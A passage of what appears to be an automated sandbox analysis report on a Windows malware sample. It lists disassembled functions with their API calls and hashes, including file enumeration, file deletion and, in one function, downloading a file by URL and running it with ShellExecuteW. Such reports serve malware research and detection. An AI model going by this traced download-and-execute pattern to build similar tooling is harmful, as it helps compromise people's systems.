                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00413864), ref: 0040FE4B
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,?,00413864), ref: 0040FE5B
                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,00413864), ref: 0040FE6A
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00413864), ref: 0040FE76
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00413864), ref: 0040FE82
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00413864), ref: 0040FE8E
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,00413864), ref: 0040FE9E
                                                  • Part of subcall function 0040FA6E: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0040FEAA,?,png,00419BC8), ref: 0040FA87
                                                  • Part of subcall function 0040FA6E: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040FA92
                                                  • Part of subcall function 0040FA6E: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040FA9D
                                                  • Part of subcall function 0040FA6E: LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C), ref: 0040FAC2
                                                  • Part of subcall function 0040FA6E: GetProcAddress.KERNEL32(00000000), ref: 0040FAC9
                                                  • Part of subcall function 0040FA6E: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040FAD7
                                                  • Part of subcall function 0040FA6E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040FAE1
                                                  • Part of subcall function 0040FA6E: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000,00000000,00000000), ref: 0040FB10
                                                  • Part of subcall function 0040FA6E: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001B,00000000), ref: 0040FB2D
                                                  • Part of subcall function 0040FA6E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040FB43
                                                  • Part of subcall function 0040FA6E: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040FB50
                                                  • Part of subcall function 0040FA6E: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040FB69
                                                  • Part of subcall function 0040FA6E: DeleteFileW.KERNEL32(00000000), ref: 0040FB70
                                                  • Part of subcall function 0040FA6E: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040FB7D
                                                  • Part of subcall function 0040FA6E: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040FB86
                                                  • Part of subcall function 0040FA6E: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040FB9B
                                                  • Part of subcall function 0040FA6E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040FBA5
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000015,?,?,?,?,?,?,?,00413864), ref: 0040FEBC
                                                • atoi.MSVCRT(00000000,?,?,?,?,?,?,?,00413864), ref: 0040FEC3
                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00413864), ref: 0040FED1
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000018,?,?,?,?,?,?,?,00413864), ref: 0040FEEA
                                                • atoi.MSVCRT(00000000,?,?,?,?,?,?,?,00413864), ref: 0040FEF1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$D@2@@std@@D@std@@$?c_str@?$basic_string@$??1?$basic_string@$??0?$basic_string@$G@2@@0@Hstd@@V10@V?$basic_string@$?data@?$basic_string@G@1@@V01@@$??4?$basic_string@?size@?$basic_string@SleepV01@atoi$?length@?$basic_string@AddressCreateD@1@@DeleteDirectoryFileGdiplusH_prologLibraryLoadLocalProcStartupTimeswprintf
                                                • String ID: XKA
                                                • API String ID: 524960498-2411217362
                                                • Opcode ID: 142451fb39d04cd77e3b131fa460c0b1b53982a89bcb1b6331a5f7176b8acc27
                                                • Instruction ID: 6aa118ed464d52dc764fa596c555646475bd38f969dfe4ec328eee1aa5caf3d4
                                                • Opcode Fuzzy Hash: 142451fb39d04cd77e3b131fa460c0b1b53982a89bcb1b6331a5f7176b8acc27
                                                • Instruction Fuzzy Hash: 07616371900219AFCF50AFA1DC5DBEE7B7CAB44305F0040FAF50AA6191DB785B898B5D
                                                Function 0040C5BF Relevance: 40.7, APIs: 27, Instructions: 179COMMON
                                                Download Yara Rule
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040C5D5
                                                • SetEvent.KERNEL32(?), ref: 0040C5DE
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040C5E7
                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6C995E04), ref: 0040C602
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00419288), ref: 0040C613
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040C625
                                                  • Part of subcall function 00411550: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 0041155F
                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411576
                                                  • Part of subcall function 00411550: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C), ref: 0041158C
                                                  • Part of subcall function 00411550: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 004115AA
                                                  • Part of subcall function 00411550: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115B4
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115BD
                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115D2
                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115DF
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411631
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 0041163A
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411643
                                                • GetTickCount.KERNEL32 ref: 0040C65C
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,00419288,00000000,?,?,00000000), ref: 0040C6BC
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00419288,00000000,?,?,00000000), ref: 0040C6CC
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00419288,00000000,?,?,00000000), ref: 0040C6DC
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00419288,00000000,?,?,00000000), ref: 0040C6EC
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,00419288,00000000,?,?), ref: 0040C6FC
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00419288), ref: 0040C706
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000004C), ref: 0040C722
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040C72E
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040C73A
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040C746
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040C752
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040C75E
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040C76A
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040C776
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040C782
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 0040C794
                                                • atoi.MSVCRT(00000000), ref: 0040C79B
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V10@0@V?$basic_string@$??0?$basic_string@V01@@$?length@?$basic_string@V12@$?c_str@?$basic_string@?substr@?$basic_string@$??4?$basic_string@?find@?$basic_string@CountD@1@@EventG@2@@std@@G@std@@TickV01@atoi
                                                • String ID:
                                                • API String ID: 2768269293-0
                                                • Opcode ID: 65c9ac0af3eee88ef9f6e8c40d1a65f52c514568fcb25a50af4b74a21dbc26c1
                                                • Instruction ID: ba60c0b36e1abbb58d34c5f0d092d0536e361110913101efae3fc3b40cd7302a
                                                • Opcode Fuzzy Hash: 65c9ac0af3eee88ef9f6e8c40d1a65f52c514568fcb25a50af4b74a21dbc26c1
                                                • Instruction Fuzzy Hash: 3E51617290011AABCB14BBA1DD5A9EE777CEB10309F0045BEF106E31A1EE385B498B59
                                                Function 004031ED Relevance: 36.1, APIs: 24, Instructions: 138fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00403203
                                                • FindFirstFileW.KERNEL32(00000000), ref: 0040320A
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00419288,00000000,?,?,?,?), ref: 00403237
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000054), ref: 00403258
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00403241
                                                  • Part of subcall function 00402049: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,[INFO],?,0040C2A1,0000004B), ref: 00402058
                                                  • Part of subcall function 00402049: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040206E
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040326D
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00413864), ref: 00403286
                                                • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000), ref: 0040328D
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040329A
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000250,?), ref: 004032B8
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004032C2
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004032CB
                                                • FindNextFileW.KERNEL32(?,?), ref: 004032E1
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000250,?), ref: 004032F6
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000), ref: 00403305
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00403311
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040331A
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403323
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00419288,?), ref: 0040334B
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 00403355
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000050,?,?,?,?,?,?), ref: 0040336C
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 00403375
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040337E
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 00403387
                                                  • Part of subcall function 004113BA: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040BF0A,?,00419958,00419288,?,00419288,?), ref: 004113C5
                                                  • Part of subcall function 004113BA: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040BF0A,?,00419958,00419288,?,00419288,?), ref: 004113D1
                                                  • Part of subcall function 004113BA: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040BF0A,?,00419958,00419288,?,00419288,?), ref: 004113DB
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$G@std@@$??0?$basic_string@G@2@@std@@V?$basic_string@$D@2@@0@Hstd@@V10@0@$D@1@@$V01@@$??4?$basic_string@?c_str@?$basic_string@FileFindV01@$??9std@@?length@?$basic_string@FirstG@1@@G@2@@0@Next
                                                • String ID:
                                                • API String ID: 2097282260-0
                                                • Opcode ID: 86f04fed1afdc9e1d3f247f9863f7772f553e519213c8ed7607902a90e0c023d
                                                • Instruction ID: e2176cce89367e2721bef7b1cfe0db9c414fcd567cc24aa7813325dec7316575
                                                • Opcode Fuzzy Hash: 86f04fed1afdc9e1d3f247f9863f7772f553e519213c8ed7607902a90e0c023d
                                                • Instruction Fuzzy Hash: C8519D7294010EABCB04EF90DC59DDF7B7CEB55316F04416AF506E30A0EA74A789CB98
                                                Function 0040D9F4 Relevance: 33.1, APIs: 22, Instructions: 113fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040D9FB
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00419E68,00414964), ref: 0040DA0F
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040DA21
                                                • FindFirstFileW.KERNEL32(00000000), ref: 0040DA28
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00413864), ref: 0040DA50
                                                • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000), ref: 0040DA5D
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040DA6A
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000250,?), ref: 0040DA8D
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040DA97
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DAA3
                                                • FindNextFileW.KERNEL32(?,?), ref: 0040DAB9
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,0041388C), ref: 0040DAD5
                                                • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000), ref: 0040DADC
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040DAE9
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000250,?), ref: 0040DB0A
                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040DB14
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DB20
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040DB3B
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(0000005D), ref: 0040DB50
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040DB59
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$G@std@@$??1?$basic_string@$??0?$basic_string@G@2@@std@@$D@1@@G@2@@0@V01@@V?$basic_string@$??9std@@FileFindG@1@@V01@$??4?$basic_string@?c_str@?$basic_string@FirstHstd@@NextV10@Y?$basic_string@
                                                • String ID:
                                                • API String ID: 4126176310-0
                                                • Opcode ID: 84be9581f6f1524c3a2e04d8118c4edc4668b7d8919671c3d8a5f736e409a5ec
                                                • Instruction ID: fe178b748797f2d553296121cb691b44c3610d80c9c14f4dbc5c7040bfc84baf
                                                • Opcode Fuzzy Hash: 84be9581f6f1524c3a2e04d8118c4edc4668b7d8919671c3d8a5f736e409a5ec
                                                • Instruction Fuzzy Hash: 2C41BB7290015DABCF15EFA0DC599DE7778FF18312F1081BAE516A20A0EB74AB49CF58
                                                Function 0040D342 Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 125filenetworkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,00414970), ref: 0040D359
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000002), ref: 0040D380
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,00000000), ref: 0040D393
                                                  • Part of subcall function 00408137: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00408147
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D3AE
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000), ref: 0040D3B9
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000003,00000000), ref: 0040D3DB
                                                • URLDownloadToFileW.URLMON(00000000,00000000), ref: 0040D3E3
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D3EE
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000001), ref: 0040D3FB
                                                • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040D408
                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,0041496C), ref: 0040D425
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000003,?,?), ref: 0040D457
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D46E
                                                • free.MSVCRT ref: 0040D48C
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,0041498C), ref: 0040D54E
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                  • Part of subcall function 004113E6: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00419970,00419BC8,00000000,00408808,)A,00000000,0000000B), ref: 004113F2
                                                  • Part of subcall function 004113E6: ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411400
                                                  • Part of subcall function 004113E6: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411422
